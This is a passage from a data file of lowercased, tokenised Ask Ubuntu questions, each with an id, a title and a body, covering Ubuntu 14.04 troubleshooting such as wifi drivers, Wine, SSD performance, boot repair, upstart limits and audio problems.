4:4.5.3 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.8.2-19ubuntu1 is to be installed depends : grass641 but it is not going to be installed
489515	how can i prevent an antivirus software form uninstalling wine applications ?	i have a couple of windows applications installed through wine and these are running quite well . the trouble , however , is that every time i run the anti-virus programme clamtk , it uninstalls the wine applications and i have to install them all over again . the only way i can avoid this is to individually exempt the files related to the wine applications from quarantine , which is obviously a bother . so my questions are : can i configure clamtk in such a way that it will automatically exempt the above-mentioned files ? and if this is not possible with clamtk , is there any other ant-virus program with which it can be done ? if the wine applications are thus exempted , will it make the system vulnerable to malwares and viruses ?
489518	mounting windows share error	so from my ubuntu 14.04 system i run the followig command : sudo mount.cifs -o username=dana //192.168.1.4/users /mnt/ it asks for sudo password an the the output : no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory password for dana @ //192.168.1.4/users : mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) now , the windows 7 pc is password protected but i provided the right password i am shore of that .
489520	just installed ubuntu on asus r512c . wifi adapter apparently not recognized	no wireless network visible during installation , which i finished with cable , and none in settings/network . how can identify my adapter ? download an appropriate driver ? i went a bit further in my inquiry , managed to find the following information : 0 : asus-wlan : wireless lan not softblocked and not hardblocked 1 : phy0 : wireless lan not softblocked but hardblocked . the network controller shows as qualcomm atheros ar9485 . not sure whether any of this helps understand the issue i have .
489521	remapping additional mouse buttons to multimedia keys	so , i bought a new mouse , and it has 4 additional buttons ( 2 thumb buttons , and scrollwheel left/right ) and i was wondering , since my pc does n't have multimedia keys , can i remap those buttons to play , pause , next and previous keys ? ?
489523	weird problem : can not connect network until a terminal is opened in live system	live system based on ubuntu server 12.04.2 with manual installed x and openbox . startx is in a shell script which is called in /etc/rc.local with su -l root -c /scriptsfolder/script.sh a program is opened in openbox autostart config file and it can not connect to a server in lan . once opened a terminal in openbox , the network goes well and the program can connect to the server . or , if pinged from other computer , a few seconds later the network goes well . really weird problem , could somebody tell me what open a terminal did to make the network goes ? i 've already checked bashrc but found nothing of value . seems that open a terminal influence only live system i installed the live system into disk and open a terminal does not get the network goes well anymore , the only way to make the net well is to ping or be pinged . so i updated the question to `` what does open a terminal do in live system that enables the network '' . it 's confusing ... sorry for my bad english . really need help .
489524	ubuntu compatible usb network card	i am looking for a usb network card ( gigabit ) and would like to know which chipsets are more supported on ubuntu so that i can buy the appropriate network adapter . i know that the atheros chipset has good support , buy are there any others . or any recommended products ?
489525	activate/deactivate wi-fi on lenovo b5400 under ubuntu 14.04	i have a lenovo b5400 with ubuntu 14.04 x64 . the ethernet port works fine . how can i enable/disable the wifi connection ? i have no hardware button for this functionality . under windows i can press fn+f5 and a dialog window appears , but i can not find this functionality under linux . lspci | grep network produces : 04:00.0 network controller : realtek semiconductor co. , ltd. rtl8723be pcie wireless network adapter the answer from here is incomplete ; any other idea ? thanks . later edit : the output of rfkill list all is : 0 : tpacpi_bluetooth_sw : bluetooth soft blocked : yes hard blocked : yes 1 : hci0 : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : yes hard blocked : yes
489526	broadcom wireless driver on lenovo b590	i 've just bought a notebook lenovo b590 with windows 8 preinstalled . i tried the live version of ubuntu 14.04 . the wifi was n't working , but i went on additional driver and i selected `` using broadcom 802.11 linux sta wireless driver source from bcwl-kernel-source ( proprietary ) '' and it worked correctly . then i installed ubuntu 14.04 , without partitions , i had n't even activated windows 8 , and the wifi was n't working . i went on additional driver ( this time in the italian version ) and i selected the same driver as before . ubuntu asked me the password and at the end of the `` applying changes '' it deselected the broadcom driver and automatically re-selected `` do not use the device '' . the live version still works . maybe are there any packages downloaded during the installation that do not work correctly with the broadcom driver ? can you help me , please ?
489527	how come you can put a question mark in file names ?	in windows , you cant put a ? in a file or directory name , because they are reserved characters for php get functions and wildcards . but in ubuntu , i can . i can name a file `` lol ? .txt '' and access it properly like any other file . how come you can do this safely in ubuntu , when you cant in windows ?
489532	turn off/sleep after script completion	i have a little script . it 's ripped out of a youtube tutorial , untested , ugly , and not very good . it 's not done and not intended for public use . here it is : # ! /bin/bash sudo apt-get -y install git g++ gcc-multilib g++-multilib libc6-dev-i386 lib32z1-dev lib32bz2-dev xserver-xorg-dev : i386 libfreetype6-dev : i386 libmirclient-dev : i386 libosmesa6 : i386 libosmesa-dev libjpeg-turbo8-dev : i386 libgl1-mesa-dev : i386 libglu1-mesa-dev : i386 libxcursor-dev : i386 libxi-dev : i386 libxrandr-dev : i386 libxinerama-dev : i386 libxcomposite-dev : i386 libdbus-1-dev : i386 libgnutls-dev : i386 libncurses5-dev : i386 libsane-dev : i386 libv4l-dev : i386 libgphoto2-6-dev : i386 liblcms2-dev : i386 liblcms1-dev : i386 gstreamer0.10-plugins-base : i386 libcapi20-dev : i386 libcups2-dev : i386 libfontconfig1-dev : i386 libgsm1-dev : i386 libtiff5-dev : i386 libmpg123-dev : i386 libopenal-dev : i386 libxrender-dev : i386 libxml2-dev : i386 libxslt1-dev : i386 libpng12-dev : i386 libssl-dev : i386 libldap2-dev : i386 unixodbc-dev : i386 sudo apt-get -y build-dep wine1.7 cd /usr/lib/i386-linux-gnu sudo ln -s libfreetype.so.6 libfreetype.so sudo ln -s libosmesa.so.6 libosmesa.so git clone git : //source.winehq.org/git/wine.git ~/wine-git cd ~/wine-git cat `` /home/krabica/dokumenty/textfiles/0099-endlessspace-wgl-sharelist-hack.patch '' | patch -p1 ./configure make i warned you . as you can see , this script calls several commands , some as root and some as the normal user , in this case `` krabica '' ( `` box '' ( as in `` cardboard box '' ) in english ) . the problem is that it takes 2+ hours to compile wine on my laptop , so want to leave it running while i go to sleep , but i want my laptop to turn off/sleep or anything ( enter a state where the computer and the fan does n't work , to save energy and let me sleep in silence ) . the problem is the shutdown must be called as sudo , or it wo n't work . but , at the time the script finishes , the password is no longer in the cache , and you need to type it again ( not very convinient when you 're asleep ) . i tried to run path/to/script & & sudo shutdown , but that did n't work either . it wants a password 15 minutes since you last typed it . is there any easy way to achieve this ? by easy i mean not changing system settings , etc . thanks .
489534	cronjob to remove directories that are smaller than x in size	i want to run a cronjob every 6 hrs that deletes directories smaller than 200mb . i know dh command would do the job , but i 'm not sure how to use the command . any help is appreciated .
489536	installing pycairo on python 3	i 'm trying to install pycairo , but my symlink is sending it to python 2 , though it requires 3 . how do i get around this error ? # ./waf build ./options ( ) the project was not configured : run `` waf configure '' first ! root @ archimedes : /home/archimedes/downloads/pycairo-1.10.0 # ./waf configure ./options ( ) setting top to : /home/archimedes/downloads/pycairo-1.10.0 setting out to : /home/archimedes/downloads/pycairo-1.10.0/build_directory ./configure ( ) checking for 'gcc ' ( c compiler ) : ok checking for program python : /usr/bin/python checking for python version : ( 2 , 7 , 3 , 'final ' , 0 ) the python version is too old , expecting ( 3 , 1 , 0 ) ( complete log in /home/archimedes/downloads/pycairo-1.10.0/build_directory/config.log ) is there a way to send it to /usr/bin/python3 instead of /usr/bin/python ( the symlink ) when it checks for python ? thanks !
489538	fatal error : gtk/gtk.h : no such file or directory	i know this question has been answered several times , i have tried each of them but still could not find the exact solution . i am starting to learn gtk + 3.0 with glade user interface . i know glade will generate xml for the design and the same xml can be used in our c/cpp program . but to execute the program , one must have all the libraries installed or path must be set to the libraries in ide 's . i am using anjuta ide for developing this program whenever i tried to build the program i get the following error . gtk/gtk.h : no such file or directory program code # include < gtk/gtk.h > ! # include < glade/glade.h > void ok_button_clicked ( gtkwidget *widget , gpointer user_data ) { printf ( `` thanks for trying out my program.\n '' ) ; gtk_main_quit ( ) ; } int main ( int argc , char *argv [ ] ) { gladexml *main_window ; gtkwidget *widget ; gtk_init ( & argc , & argv ) ; /* load the interface */ main_window = glade_xml_new ( `` example-1.glade '' , null , null ) ; /* connect the signals in the interface */ /* have the ok button call the ok_button_clicked callback */ widget = glade_xml_get_widget ( main_window , `` okbutton '' ) ; g_signal_connect ( g_object ( widget ) , `` clicked '' , g_callback ( ok_button_clicked ) , null ) ; /* have the delete event ( window close ) end the program */ widget = glade_xml_get_widget ( main_window , `` mainwindow '' ) ; g_signal_connect ( g_object ( widget ) , `` delete_event '' , g_callback ( gtk_main_quit ) , null ) ; /* start the event loop */ gtk_main ( ) ; return 0 ; } whenever i try to add lib or external lib , i am not able to add gtk/gtk.h file , the same file is already there in /usr/include/gtk-3.0/gtk/gtk.h and when i try to copy the same in libanjuta the same code still giving the same error , any help will be highly appreciated friends , i am struggling lot to execute the program .. thanks amul bhatia
489542	how to set/change default download folder for uget ?	whenever i download with uget , the default download folder is $ home ( for my case /home/pandya ) . i know i can change download destination at time as follows : but i want to change it permanently so-that i do n't need to change every time . where is setting or how to change ?
489544	why the application menu bar hides under the main menu bar in ubuntu 14.04	in ubuntu 14.04 why the application menu bar hides under the main menu bar whenever we try save any files which are related to that application ? how can we get rid of this ?
489546	installing winusb on ubuntu 14.04	i am unable to install winusb in ubuntu 14.04 using command : sudo apt-get install winusb what is the correct way to install winusb in ubuntu 14.04 ? or is there any other application available to create windows bootable usb in ubuntu 14.04 ?
489548	new ssd is very slow under xubuntu 14.04	i got myself a transcend 64gb ssd ( model number : ts64gssd340 ) . i put the ssd into a tiny netbook i have . netbook specs are : make/model : acer v5-123 cpu : amd e1-2100 with radeon hd 8210 ram : ( came with 4gb , but , i upgraded to 8gb because i put /tmp into tmpfs ) this netbook came with windows 8.1 , but , i removed that entire hdd and put the transcend 64gb ssd in its place . then , i installed xubuntu 14.04 onto the ssd . firmware info for the transcend ssd is as follows : $ sudo hdparm -i /dev/sda | grep -i firmware firmware revision : svn263 i checked online and could n't find any ( new/updated ) firmware files for this drive . based on various notes found all over the web , i have done the following ssd optimizations : left about 4gb of unused + unallocated space on the drive at the time of creating partitions ( i.e. , at the time of installation ) added noatime for / to the fstab added `` fstrim -v / '' to rc.local and yes , my rc.local is always executable because i have a bunch of other things i do in it removed the fstrim from cron weekly made sure that the ff cache is 0 now , the real issue is that the drive is dead slow . i mean , booting up takes over a minute . starting firefox , terminal , gedit , etc , take a lot of time . ( before you jump onto me ... yes , i did install a lot of software , including my favorite editor gedit , onto this system ) . my only point of comparison at this point is time is my other notebook ( fujitsu , core i3 , 8gb , 500 gb magnetic hdd ) running xubuntu 13.10 . that notebook boots up in under a minute , possibly in half a minute ! but , this ssd netbook running xubuntu 14.04 neither boots up quickly nor does it start apps quickly . clearly , my assumption that an ssd will speed up things was wrong ! ! ? ? additional info : xubuntu kernel is 3.13.0-30-generic ( 64 bit ) . update # 1 i did two tests mentioned in the arch wiki ssd benchmarking page , as suggested by @ tuknutx . each test was done four times : `` sudo hdparam -tt /dev/sda '' generated `` average cache reads at 1030.7125 mbps '' and `` average buffered reads at 362.2075 mbps '' dd read test with empty buffer cache generated `` average reads at 383.5 mbps '' i put together the following script ( based on the contents of arch wiki ssd benchmarking page ) to do the `` dd read test '' : # first create a file dd if=/dev/zero of=./tempfile bs=1m count=1024 conv=fdatasync , notrunc for i in 1 2 3 4 do echo `` run number $ { i } ... '' # then clear the buffer cache sudo bash -c `` echo 3 > /proc/sys/vm/drop_caches '' # now read the file dd if=./tempfile of=/dev/null bs=1m count=1024 echo done i have not performed other tests mentioned on that page . update # 2 i did one thing after completing those tests : i had put `` vm.vfs_cache_pressure=50 '' into my /etc/sysctl.conf , but , now i removed it . after that change and a reboot , the system seems to be booting up ( from `` acer '' logo to auto-login '' ) in just under 30s . but , my assumption was that things should be even faster than that because my magnetic hdds are giving me those sort of boot times ! ! update # 3 i still have to follow @ lekensteyn suggestion of moving the ssd onto the core i3 notebook . i will do that soon and report here . should n't ssds be blazing fast ? given all that info , what would you recommend i do to speed up the drive . i would appreciate if you give me specific directions ( text + commands ) to run to speed up the drive .
489549	ubuntu dual boot - only one has internet connection	i have ubuntu 12.04.02 and have working internet connection : then i have install among the 12.04 the new 14.04 . unfortunately i am not able to connect to the internet - it is always loading . could anyone tell what is causing that ? i guess some driver is missing because if i connect the ethernet cable to other pc it is working . but how can i debug what i need and downloaded as i have not got network on the 14.04 ?
489554	running hauppage wintv hvr 1110 ubuntu 12.04 / 14.04	i could install the hauppage wintv hvr 1110 on ubuntu 12.04 / 64b . i used the composite signal input , mounted as /dev/video1 . it worked well for some time , but recently ( after some updates from ubuntu ... ) the device /dev/video1 is no longer present , only the /dev/video0 for the tuner . i installed the driver ( phillps saa ... 34 ) new , it seems to be correct so far corresponding to the results of dmsg ... . i even installed the new ubuntu-version 14.0 , same result , no more /dev/video1 for the usage of the composite input . if i check the source with qtv4l i can get snapshots from the card and even from the composite input , means that the card must be recognized somehow and is working . i have no idea how to go on with this problem and hoping to find some hints . best regards maschuh
489557	i have trouble playing youtube videos on firefox using gnash	i have been using 12.04 since it came out ( i had to experiment to get yt work at all ) and i have kept it up-to-date . after the latest updates , firefox will play yt videos if i do n't sign in , but will not play them if i do . i do n't use flashplayer , but gnash swf viewer and gstreamer , and the window says `` powered by youtube '' . if the video is html5 , i get sound but not videos . chrome works , but crashes a lot . neither of them will load the comments on the video . anyone have an idea of what 's up ?
489558	how do i modify this script to get only the useful disk info i need in a list	i would like to get a list of all my hard disks including the following information . serial number , uuid , size and the names and sizes of all of the partitions on each disk . i found this which gets me half way there for file in $ ( find /sys/block/ [ sh ] [ dr ] */device/ /sys/block/ [ sh ] [ dr ] */ -maxdepth 1 2 > /dev/null|egrep ' ( vendor|model|/size|/sys/block/ [ sh ] [ dr ] ./ $ ) '|sort ) ; do [ -d $ file ] & & echo -e `` \n -- device $ ( basename $ file ) -- '' & & continue ; grep -h . $ file|sed -e 's|^/sys/block/|| ; s|/d*e*v*i*c*e*/*\ ( . *\ ) : | \1 |'|awk ' { if ( $ 2 == `` size '' ) { printf `` % -3s % -6s : % d mb\n '' , $ 1 , $ 2 , ( ( $ 3 * 512 ) /1048576 ) } else { printf `` % -3s % -6s : `` , $ 1 , $ 2 ; for ( i=3 ; i < nf ; ++i ) printf `` % s `` , $ i ; print $ ( nf ) } ; } ' ; done my preference is for it to go to a text file . i assume i can do that just by adding `` > ~/disks.txt '' to the end of the line would really appreciate it if someone could help me figure out how to modify the command so it adds partition names and sizes .
489559	can i use comodo without filesystem filter driver	i downloaded comodo on 14.04 and it says filesystem not loaded so i went out and found some patches but i dont want to mess around with the kernel so can i use comodo without the filesystem filter driver , will it work the same way .
489560	comand : `` unity-control-center background '' not working	from man unity-control-center it says directly open panel for background : background the background panel lets you set your desktop background . but when i run unity-control-center background it getting following error : ** ( unity-control-center:3169 ) : warning ** : could not find settings panel `` background '' other panels like bluetooth , color , datetime , display , etc . working fine . only background not working . how to solve ? or is it bug ?
489561	terminal does not appear in `` open with '' program list	i have tried uninstalling and reinstalling gnome-terminal and installing konsole , neither appear as an option to open programs with . i 'm trying to run a .sh shell . edit : yes , i had selected to allow code execution already .
489562	better fglrx driver for radeon hd 8570m	my new laptop computer uses a amd apu with the radeon hd 8570m graphics chip . by default , the x.org open source driver is used . even though it is working , i still prefer the offered proprietary driver ( 2:13.350.1-0ubuntu2 ) . the open source driver seems to let the chip consume more power and only supports opengl 3.0 ( mesa 10 ... . ) . using the proprietary amd catalyst driver lets the battery last longer , and uses opengl 4.3 , but it makes it impossible to change the screen brightness . as i am currently developing a game using opengl ( as a paper for school ) i would like to use a rather current version of it . is there any newer version of fglrx which supports opengl 4.3 ( maximum the 8570m supports ) and lets me change the display brightness ? i once tried the beta fglrx from amd 's support website , but it screwed up my system and i had to reinstall . however , i do n't have the time to perform a full reinstall again at this moment . is there any way i may undo the problems a installation of a non-working driver may bring ( e.g . no gui ) ( like switching back to xserver-xorg-video-ati from command line as the driver manager does )
489563	how to switch from ubuntu gnome to xubuntu	i am currently using ubuntu gnome as desktop environment and my computer is dual-booting between ubuntu and and windows . i want to switch from gnome to xubuntu without losing any of my data . is there any way to do that ?
489564	launchpad : cli `` copying packages ''	i 'm using launchpad to upload a .dsc , a debian.tar.gz and a .orig.tar.xz . the orig archive contains both i386 and amd64 files , and i use debian/rules to build different architecture packages . but it only builds on trusty series . i would like to use the feature copy packages , but i want it to be automated . currently , i have to connect to launchpad , click view package details , click copy packages , and use : > destination ppa : > this ppa > destination series : > utopic > copy existing binaries is there a way to automate all this `` copy the existing binaries from the older series to the new series '' , or to do it through cli to use it in a script ? thank you leads : q : maybe ubuntu-archive-tools can help me do that , it seem to have a copy-package python script ? a : it does n't work with that : python copy-package -y -b -- ppa-name=myname/myppa -- to-ppa-name=myname/myppa -s trusty -- to-suite=utopic -e versionofpackage q : maybe if i change my changelog entry from trusty ; urgency=low to utopic trusty ; urgency=low ? a : it does n't work : unable to find distroseries : utopic trusty . further error processing not possible because of a critical previous error . q : build 1 orig.tar.xz and multiple .dsc & debian.tar.gz a : i currently build an incremented version-number ( i.e . mypackage-1.1.0-0trusty0 and mypackage-1.1.0-0utopic0 ) , but the solution could be better since i have to reupload the orig.tar.xz for each and that it takes twice the place in the ppa since the built .deb are n't considered as a copy of each other but 2 packages .
489567	installing apps with .click extension on ubuntu 14.04	i want to install apps with .click extension on ubuntu 14.04 on offline installation like .exe and .apk files is there a way for such offline installation ?
489568	ubuntu desktop theme recommendations	i 've been using ubuntu 14.04 desktop since release and while i like the unity interface , i 'm not a big fan of the color scheme or the fonts used by default . what would your recommendations be for options ? look for unity themes ? is there a way to change the color scheme ( i 'm more a summer guy then an autumn guy ) ? how about the fonts ( without trying each and every one ) ? any recommendations are appreciated .
489569	installing single os ubuntu 14.04 in efi mode	i installed ubuntu 14.04 on a tohiba laptop from a iso image written to usb . the original os was windows 8 , but when i was installing the ubuntu , it said that no os is detected . i did not care , as i wanted to completely remove the windows and install single os , ubuntu . installation was smooth as usual , but there was a problem in creating the efi boot . now the system does not boot to ubuntu . i tried boot-repair , but no success . how can i freshly install ubuntu with a correct boot ?
489571	plugged in , battery not charging , not running down	this morning , after being plugged in all night , my asus n550j , xubuntu saucy , showed 28 % battery . when it is plugged in , it shows the charging icon , yet the percent charge never goes up . when it is unplugged , the charge goes down -- now it is at 15 % . i tried restarting . i tried another ac adaptor . no difference . what is the problem here ? is the battery in fact charging correctly , but the indicator is failing to ever go up when it is charging ? or is there a real problem with battery charging ? ( but if so , why does the computer last indefinitely on ac power , and why does the indicator show `` charging '' ? ) ( as a maybe-related issue : 3 days ago the fan got really loud , intermittently . the laptop was not noticeably hotter than usual when this occured . but that loudness stopped . ) edit : answer below .
489576	how to understand configuration files syntax ?	now i know this is a little abstract but how does one know how do edit a config file for example /etc/systemd/logind.conf how do you know what syntax is allowed and what not ?
489577	flash player is not working and do n't know what to do to fix it	new to ubuntu and it worked fine for about 6 weeks but now the flash player does n't work reloaded the os and still the same not sure what to do
489578	what do i need to do to get virtualbox with dkms installed ?	i am trying to install virtualbox 4.3 on ubuntu 14.04 64-bit via apt along with the dkms package , but the virtualbox kernel fails to get installed . what do i need to do to get virtualbox with dkms installed ?
489579	ubuntu one , windows 7 downloader , u1-files location	this should be a ridiculous question , but i bet someone else will also need it answered . i recently downloaded the ubuntu one , windows 7 downloader ( to get all of my files off of u1 ) . the downloader never asked me where to put the file , and i ca n't find them . i know they took up room on my hard drive , so i know they were dodownloaded , but i ca n't find them . the only instructions for the installer is that they are in the u1-files folder . i have no idea where that would be , and searches are turning up nothing . also , i know it is n't in the actual $ home/ubuntu one folder , because none of those files have been changed , and it 's the wrong size . any help on this ridiculous matter is appreciated .
489580	tl-wn821n ( v4 ) wont turn on ( working on another installation )	i 've had dual boot with ubuntu ( work ) +mint ( general ) . the wireless card ( tl-wn821n ( v4 ) ) used to work very well ( not without issues , i had to receive help on linux mint forums ) now i decided to put ubuntu instead of mint , and the card does n't turn on . i cant remember the steps to make it work , so now i have two installation of ubuntu , one detects the card , the other does n't . i tried following the advice i mention above , without luck . please tell me the steps to figure out why the wireless card refuses to turn on .
489582	error/bug : `` the owner could not be changed '' and nautilus crashed !	consider i have directory ( let named mydir ) of which owner is pandya ( $ user = pandya ) . now if i browse nautilus as root ( sudo ) and if i click on permissions tab of property ( alt+enter ) then nautilus crashed with blink of following error . in other words i ca n't show permission tab of directory of which user is not root , form rooted nautilus ! how to solve this ( stop crashing of nautilus ) ? ( note that chown to root is not solution )
489587	after the launcher autohides , windows do not resize top full screen in ubuntu 14.04	after the launcher auto hides the windows do not resize itself to full screen .instead a rectangular space is left on left side of ubuntu 14.04 . like this how can i fix it so the window resizes to full screen when the launcher auto-hides ?
489594	can not find command added to path - sail_align	i 'm trying to build sail_align programm by following these instructions . so far everything went ok and i 've completed the last fourth step without errors : 4 ) sudo ./build install this command will install the module . the following perl scripts will be added to your path : sail_align , sail_align_parallel however , when i run the following to test the installation : sail_align -i support/data/timit_5.wav -t support/data/timit_5.txt \ -w support/test/local -e timit_sample_test -c config/timit_alignment.cfg i get the message that sail_align command not found . what am i doing wrong ? here is the script of build file : $ progname = basename ( $ 0 ) ; $ orig_dir = cwd : :cwd ( ) ; my $ base_dir = '/home/maximus/sail_align-master ' ; if ( ! magic_number_matches ( ) ) { unless ( chdir ( $ base_dir ) ) { die ( `` could n't chdir ( $ base_dir ) , aborting\n '' ) ; } unless ( magic_number_matches ( ) ) { die ( `` configuration seems to be out of date , please re-run 'perl build.pl ' again.\n '' ) ; } } unshift @ inc , ( ) ; } close ( *data ) unless eof ( *data ) ; # ensure no open handles to this script use module : :build ; module : :build- > version ( q { 0 } ) ; # some platforms have problems setting $ ^x in shebang contexts , fix it up here $ ^x = module : :build- > find_perl_interpreter ; if ( -e 'build.pl ' and not module : :build- > up_to_date ( 'build.pl ' , $ progname ) ) { warn `` warning : build.pl has been altered . you may need to run 'perl build.pl ' again.\n '' ; } # this should have just enough arguments to be able to bootstrap the rest . my $ build = module : :build- > resume ( properties = > { config_dir = > '_build ' , orig_dir = > $ orig_dir , } , ) ; $ build- > dispatch ; edit echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games locate sail_align outputs nothing edit2 running find / 'sail_align ' outputs the following /home/maximus/perl5/bin/sail_align /home/maximus/perl5/bin/sail_align_parallel /home/maximus/sail_align-master /home/maximus/sail_align-master/blib/script/sail_align /home/maximus/sail_align-master/blib/script/sail_align_parallel /home/maximus/sail_align-master/docs/sail_align_tutorial_vlsrp2011.pdf /home/maximus/sail_align-master/docs/sail_align_tutorial_vlsrp2011.ppt /home/maximus/sail_align-master/scripts/sail_align /home/maximus/sail_align-master/scripts/sail_align_parallel
489595	finalize sony camcorder dvd	well , hello i have had a sony video-camera ( sony dcr-dvd105e ) since 2006 . it exports video to mini-dvd . well i recently found the camera and its discs . however , i have lost its batteries and its adaptor , so i can not turn it on . unfortunately , many of the discs i had used are un-finalized and my computer does read them as blank dvd-s. as i can not use the camera to finalize them , i used testdisk - photorec but the result was approximately 600 small .mpg videos and some .png photos ( hahaha obviously i did n't rec so many files ! : p ) . an idea is to use wine to install cdroller or something.. but generally i do n't want to use windows software anymore , at least in my ubuntu ! any ideas how to finalize the unfinalized dvds ?
489596	voice recorder for 14.04	for few days i 've been trying to find a voice recorder , but i 'm frustrated . skype working fine and alsamixer i 'm using pulseaudio . when i open the below softwares , my microphone stops working , even skype does n't work . i only hear noise . if i uninstall the softwares and reset pulseaudio it becomes normal again . tried audacity -- i hear noise only . tried audio-recorder -- recording but lots of noise . i need a good working software to record voice . need help .
489601	upstart does not satisfy resources usage requirements set by `` limit '' stanza	i am experiencing problems with upstart . i am trying to start the transmission-daemon ( a bittorrent client ) with a limit on the maximum resident set size ( rss ) . this is the /etc/init/transmission-daemon.conf file : start on ( filesystem and net-device-up iface=lo ) stop on runlevel [ ! 2345 ] # give time to send info to trackers kill timeout 30 limit rss 1024 2048 setuid debian-transmission setgid debian-transmission respawn pre-start script # stop job from continuing if no config file found for daemon [ ! -f /etc/default/transmission-daemon ] & & { stop ; exit 0 ; } # source the config file . /etc/default/transmission-daemon # stop job from continuing if admin has not enabled service in # config file . [ `` $ enable_daemon '' ! = 0 ] || { stop ; exit 0 ; } end script script . /etc/default/transmission-daemon exec /usr/bin/transmission-daemon -f $ options end script as you can see , i have added the limit ( rss should be expressed in kibs if i am not wrong ) just atop the script . when i run the service with sudo service transmission-daemon start , i can see with top that the single transmission-daemon process uses much more resident memory than the limit i have set above , and saturates all the available memory . please note that this does not work even if i use dumb limits such as `` limit rss 1 2 '' . do you have any clue ? thanks in advance . update : it seems that the correct unit is bytes and not kib or kbs . i tried to set limit as 268435456 536870912 . as far as i can see , the process now does not go over the soft limit . unfortunately , it directly goes to segfault when approaching to reach that limit . this is the output of dmesg [ 24165656.190272 ] transmission-da [ 3488 ] : segfault at 0 ip 00007ffad86602f6 sp 00007ffad203ea00 error 6 in transmission-daemon [ 7ffad863b000+75000 ] [ 24165656.428762 ] init : transmission-daemon main process ( 3486 ) killed by segv signal [ 24165656.428790 ] init : transmission-daemon main process ended , respawning
489602	ubuntu 14.04 ca n't join windows domain	i tried to make ubuntu 14.04 join 2012 server domain . my first try : sudo apt-get install likewise-open5 result : building dependency tree reading state information ... done e : unable to locate package likewise-open5 then i tried to update apt-get that was ok. but after i get the same error message . i am a very beginner at using ubuntu , i successfully set ip address for ubuntu and for windows domain . could you please help me ? i am using ubuntu 14.04 desktop .
489605	driver for graphic card nvidia geforce gt 820m ?	i recently purchased dell laptop with the graphic card specification as provided above but could not get the required driver ? please help anyone from ubuntu community and please leave link if any for the same ... ! i have downloaded from their official site but is yet after double clickin and all yet not able to figure my way out
489606	ca n't specify needed grub file location partition in boor-repair when using `` advanced options ''	i had a laptop with pre-installed windows 8 with uefi . then i installed ubuntu 14 . now i 'm fighting with grub file to get an opportunity to chose whether it 's windows or ubuntu is ran after laptop start . following installation instructions for cases when ubuntu is being installed right with windows 8 ( with uefi ) , after ubuntu i installed and ran boot repair using recommended repair option but it did n't work for me and finished with an error . i was advised to use gparted and create a separate /boot partition to fix that . i followed these instructions : https : //help.ubuntu.com/community/bootpartition i additionally should mention that i had to use gparted livecd to have this done . otherwise it was impossible as the partition where ubuntu is installed is already mounted and in use . so i did not have an opportunity to unmount it to create /boot partition . here is the way my hard drive is parted now : disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 420mb 419mb ntfs basic data partition hidden , diag 2 420mb 693mb 273mb fat32 efi system partition boot 3 693mb 827mb 134mb microsoft reserved partition msftres 4 827mb 162gb 161gb ntfs basic data partition msftdata 5 162gb 182gb 20,6gb ntfs basic data partition hidden , msftdata 6 182gb 945gb 763gb ntfs basic data partition msftdata 9 945gb 946gb 1173mb ext4 7 946gb 996gb 50,1gb ext4 8 999gb 1000gb 1659mb linux-swap ( v1 ) basic data partition you may see that there is sda9 and sda7 partitions . sda7 is where ubuntu actually installed . sda9 is what i separated using gparted in order to use further as /boot partition . my issue is that now i 'm trying to follow https : //help.ubuntu.com/community/bootpartition instructions . in step6 i can not chose my sda9 to use as a `` separate boot partition '' for some reason . this option is just greyed out for me ( inactive ) . please , advise guys
489609	how can i cleanly remove pulseaudio in ubuntu 14.04 ?	i am having sound issues in ubuntu 14 , mostly underruns causing skipped and ugly noises and i want to remove pulse audio in an attempt to debug . but when i do this breaks system settings in ubuntu . fixing this be installing ubuntu-desktop or unity result in pulse being reinstalled . i have blacklisted a few drivers i 'm not using with not positive or negative effect . i have also tried removing pulse and removing the ~/.pulse folder before reinstalling . any help appreciated .
489614	virtual box , ubuntu , modular programming in ubuntu	i installed ubuntu 11.04 in virtualbox . now , my problem is that i am unable to compile modules as part of learning kernel module programming . it gives error 2 . will anyone please help me ? root @ mohan-virtualbox : /home/mohan/desktop # make make -c /usr/src/linux-headers-2.6.38.8-generic subdirs=/home/mohan/desktop modules make : *** /usr/src/linux-headers-2.6.38.8-generic : no such file or directory . stop . make : *** [ all ] error 2 root @ mohan-virtualbox : /home/mohan/desktop # mount -t vboxsf e_drive /home/mohan/desktop/e\ drive/ /sbin/mount.vboxsf : mounting failed with the error : protocol error root @ mohan-virtualbox : /home/mohan/desktop # mount -t vboxsf e_drive /home/mohan/desktop/e\ drive/ root @ mohan-virtualbox : /home/mohan/desktop #
489616	usb stick for mac	i would like to install ubuntu on my mac but i need to have ubuntu on a memory stick rather than a cd . is there a memory stick i can buy
489619	adobe flash storage settings	i have recently installed ubuntu 14.04 . i want to increase the local storage , but i can not figure it out on this operating system . i have tried everything that i have researched , i think anyway . when i go to the global settings in adobe and set it to unlimited..or whatever amount , and then click never ask again , it just goes back to 0 . in the specific page that i want to increase the storage , when i right click..the settings box pops up , but it is unusable . i have re-installed already . can someone help me figure this out ? i am pretty unfamiliar with ubuntu .
489620	xubuntu default desktop icons do not display ?	even though i have the default icons set to display in settings , they do not display . see the image below . ideas ? ? ? ?
489630	how to change specific icons in the unity launcher ( ubuntu 14.04 )	i would like to change some specific icons in the launcher but no matter what i try i can not solve this issue if someone could possibly supply step by step i would be grateful .
489632	alias 's in .bash* not working	i am trying to create an alias and it does not seem to be working . i have tried it with both .bashrc and .bash_aliases . if i open my terminal and perform source .bashrc , then they work ok. what am i missing ? i am using 12.04
489636	what 's the best package to add to an ubuntu vps account to get a terminal window ?	for my pair networks vps ( running ubuntu 10.04 on amd64 ) , and working install details with its illustrious support team , i am interested in suggestions for a robust terminal quasi-gui 'd window package for using grep , egrep , ed , sed , find , i/o piping , and redirection of stdin/stdout/stderr ) , i.e. , accessible through my ssl-secured ( https ) url ? thanks .
